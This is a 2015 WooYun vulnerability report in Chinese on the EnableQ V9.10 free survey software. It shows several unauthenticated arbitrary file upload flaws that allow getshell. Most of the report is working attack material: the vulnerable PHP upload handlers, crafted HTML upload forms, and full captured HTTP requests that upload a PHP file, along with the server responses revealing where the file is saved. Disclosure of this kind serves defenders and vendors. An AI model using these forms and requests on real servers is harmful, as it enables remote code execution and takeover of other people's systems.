缺陷编号:WooYun-2015-0128219
漏洞标题:EnableQ官方免费版存在多处任意文件上传,免登陆可直接getshell
相关厂商:北京科维能动信息技术有限公司
漏洞作者:Bear baby
提交时间:2015-07-21 22:25
公开时间:2015-10-20 13:51
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:18
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-15: 细节向核心白帽子及相关领域专家公开
2015-09-25: 细节向普通白帽子公开
2015-10-05: 细节向实习白帽子公开
2015-10-20: 细节向公众公开
《一直默默努力》
版本:EnableQ_V9.10_免费版_2问卷许可证_整合安装包_For Windows
下载路径:
http://www.enableq.com/control/WebAPI/Download.php?downloadID=52&language=CN
看页面上面的下载次数还挺多的 ,26万多次下载。
虽然官方已经更新到10.20但是提供的免费版还是9.10版,简单分析一下,该版本存在多处任意文件上传漏洞,导致可直接Getshell。文件位置:Android/FileUpload.php部分代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
session_start( );<br> require_once( ROOT_PATH."Entry/Global.fore.php" );<br> $thisFiles = "uploadedfile_".$_GET['optionID'];<br> $filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";<br> CreateDir( $filePhyPath );<br> $time = Time( );<br> if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )<br> {<br> while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )<br> {<br> $theFileTime = filectime( $filePhyPath.$tmpFile );<br> if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )<br> {<br> @unlink( $filePhyPath.$tmpFile );<br> }<br> }<br> closedir( $tmpFilePath );<br> }<br> if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )<br> {<br> header( "HTTP/1.1 500 File Upload Error" );<br> if ( isset( $_FILES[$thisFiles] ) )<br> {<br> echo "false|".$_GET['optionID']."|".$_FILES[$thisFiles]['error'];<br> }<br> exit( );<br> }<br> $question_File_ID = dmeqjch( "_", $thisFiles );<br> $tmpExt = dmeqjch( ".", $_FILES[$thisFiles]['name'] );<br> $tmpNum = count( $tmpExt ) - 1;<br> $extension = strtolower( $tmpExt[$tmpNum] );<br> if ( $question_File_ID['2'] != "" )<br> {<br> $newFileName = $question_File_ID['2']."_".date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;<br> }<br> else<br> {<br> $newFileName = date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;<br> }<br> if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$newFileName ) )<br> {<br> echo "true|".$_GET['optionID']."|".$newFileName;<br> exit( );<br> }<br> ?> |
没啥验证即可上传任意文件,保存位置为PerUserData/tmp/根据上面的代码构造一个上传页面如下,
1 2 3 4 |
<form action="http://网站/Android/FileUpload.php?optionID=1" method="post" enctype="multipart/form-data" name="form1"><br> <input type="file" name="uploadedfile_1" /><br> <input type="submit" name="button" value="提交" /><br> </form> |
Fiddler抓包如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
RequestPOST **.**.**.**:9009/enableq/Android/FileUpload.php?optionID=1 HTTP/1.1<br> Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*<br> Accept-Language: zh-CN<br> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)<br> Content-Type: multipart/form-data; boundary=---------------------------7df15424111c02<br> Accept-Encoding: gzip, deflate<br> Connection: Keep-Alive<br> Content-Length: 351<br> Host: **.**.**.**:9009<br> Pragma: no-cache<br> Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3-----------------------------7df15424111c02<br> Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"<br> Content-Type: application/php<?php phpinfo();?><br> -----------------------------7df15424111c02<br> Content-Disposition: form-data; name="button"submit<br> -----------------------------7df15424111c02—Response<br> HTTP/1.1 200 OK<br> Date: Tue, 21 Jul 2015 13:12:48 GMT<br> Server: Apache/2.2.19 (Win32) PHP/5.2.17<br> X-Powered-By: PHP/5.2.17<br> Expires: Thu, 19 Nov 1981 08:52:00 GMT<br> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br> Pragma: no-cache<br> Content-Length: 28<br> Keep-Alive: timeout=5, max=100<br> Connection: Keep-Alive<br> Content-Type: text/htmltrue|1|20150721211248628.php |
对应路径即为:/PerUserData/tmp/20150721211248628.php,如下图
第二处文件位置:/JS/DistributionUpload.php部分代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
$thisFiles = $_POST['uploadFileName'];<br> $filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";<br> CreateDir( $filePhyPath );<br> $time = Time( );<br> if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )<br> {<br> while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )<br> {<br> $theFileTime = filectime( $filePhyPath.$tmpFile );<br> if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )<br> {<br> @unlink( $filePhyPath.$tmpFile );<br> }<br> }<br> closedir( $tmpFilePath );<br> }<br> if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )<br> {<br> header( "HTTP/1.1 500 File Upload Error" );<br> if ( isset( $_FILES[$thisFiles] ) )<br> {<br> echo $_FILES[$thisFiles]['error'];<br> }<br> exit( );<br> }<br> if ( file_exists( $filePhyPath.$_FILES[$thisFiles]['name'] ) )<br> {<br> @unlink( $filePhyPath.$_FILES[$thisFiles]['name'] );<br> }<br> if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$_FILES[$thisFiles]['name'] ) )<br> {<br> echo $_FILES[$thisFiles]['name'];<br> exit( );<br> } |
和第一个代码基本一致,没过滤。稍微更改下构造的上传页面如下:
1 2 3 4 5 |
<form action="http://网站/JS/DistributionUpload.php" method="post" enctype="multipart/form-data" name="form1"><br> <input type="hidden" name ="uploadFileName" value="uploadedfile_1" /><br> <input type="file" name="uploadedfile_1" /><br> <input type="submit" name="button" value="submit" /><br> </form> |
Fiddler抓包如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
POST **.**.**.**:9009/enableq/JS/DistributionUpload.php HTTP/1.1<br> Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*<br> Accept-Language: zh-CN<br> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)<br> Content-Type: multipart/form-data; boundary=---------------------------7df3a1a111c02<br> Accept-Encoding: gzip, deflate<br> Connection: Keep-Alive<br> Content-Length: 465<br> Host: **.**.**.**:9009<br> Pragma: no-cache<br> Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3-----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="uploadFileName"uploadedfile_1<br> -----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"<br> Content-Type: application/php<?php phpinfo();?><br> -----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="button"submit<br> -----------------------------7df3a1a111c02--Response<br> HTTP/1.1 200 OK<br> Date: Tue, 21 Jul 2015 13:21:10 GMT<br> Server: Apache/2.2.19 (Win32) PHP/5.2.17<br> X-Powered-By: PHP/5.2.17<br> Expires: Thu, 19 Nov 1981 08:52:00 GMT<br> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br> Pragma: no-cache<br> Content-Length: 5<br> Keep-Alive: timeout=5, max=100<br> Connection: Keep-Alive<br> Content-Type: text/htmli.php |
这个倒是连文件名都没改,对应路径/PerUserData/tmp/i.php,如下图。
第三处文件位置:/JS/FileUpload.php相关代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
$thisFiles = $_POST['uploadFileName'];<br> if ( $Config['dataDomainName'] != "" )<br> {<br> $theFileTime = trim( $_POST['uploadFileTime'] );<br> $filePhyPath = $Config['absolutenessPath']."/".$Config['dataDirectory']."/response_".$_POST['theSurveyID']."/".date( "Y-m", $theFileTime )."/".date( "d", $theFileTime )."/";<br> }<br> else<br> {<br> $filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";<br> }<br> CreateDir( $filePhyPath );<br> $time = Time( );<br> if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )<br> {<br> while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )<br> {<br> $theFileTime = filectime( $filePhyPath.$tmpFile );<br> if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )<br> {<br> @unlink( $filePhyPath.$tmpFile );<br> }<br> }<br> closedir( $tmpFilePath );<br> }<br> if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )<br> {<br> header( "HTTP/1.1 500 File Upload Error" );<br> if ( isset( $_FILES[$thisFiles] ) )<br> {<br> echo $_FILES[$thisFiles]['error'];<br> }<br> exit( );<br> }<br> $question_File_ID = dmeqjch( "_", $thisFiles );<br> $tmpExt = dmeqjch( ".", $_FILES[$thisFiles]['name'] );<br> $tmpNum = count( $tmpExt ) - 1;<br> $extension = strtolower( $tmpExt[$tmpNum] );<br> if ( $question_File_ID['1'] != "" )<br> {<br> $newFileName = $question_File_ID['1']."_".date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;<br> }<br> else<br> {<br> $newFileName = date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;<br> }<br> if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$newFileName ) )<br> {<br> echo $newFileName;<br> exit( );<br> } |
构造上传页面同第二个。Fiddler抓包如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
Request<br> POST **.**.**.**:9009/enableq/JS/FileUpload.php HTTP/1.1<br> Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*<br> Accept-Language: zh-CN<br> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)<br> Content-Type: multipart/form-data; boundary=---------------------------7df3a1a111c02<br> Accept-Encoding: gzip, deflate<br> Connection: Keep-Alive<br> Content-Length: 465<br> Host: **.**.**.**:9009<br> Pragma: no-cache<br> Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3-----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="uploadFileName"uploadedfile_1<br> -----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"<br> Content-Type: application/php<?php phpinfo();?><br> -----------------------------7df3a1a111c02<br> Content-Disposition: form-data; name="button"submit<br> -----------------------------7df3a1a111c02--Response<br> HTTP/1.1 200 OK<br> Date: Tue, 21 Jul 2015 13:26:46 GMT<br> Server: Apache/2.2.19 (Win32) PHP/5.2.17<br> X-Powered-By: PHP/5.2.17<br> Expires: Thu, 19 Nov 1981 08:52:00 GMT<br> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br> Pragma: no-cache<br> Content-Length: 23<br> Keep-Alive: timeout=5, max=100<br> Connection: Keep-Alive<br> Content-Type: text/html1_20150721212647249.php |
如下图
剩下文件位置:/JS/RecFileUpload.php/JS/ReportFileUpload.php代码问题、构造上传页面和第三个一致,此处不再叙说。另有几处上传问题默认需要增强许可授权,此处不贴出。
危害等级:无影响厂商忽略
忽略时间:2015-10-2013:51
https:///vul/info/qid/QTVA-2014-
该漏洞存在于老版本,并且在360漏洞平台上2014-12-02已经报告,[email protected] baby
暂无
审核的同志幸苦了。。这么晚还在工作。向您致敬。。
原文连接
的情况下转载,若非则不得使用我方内容。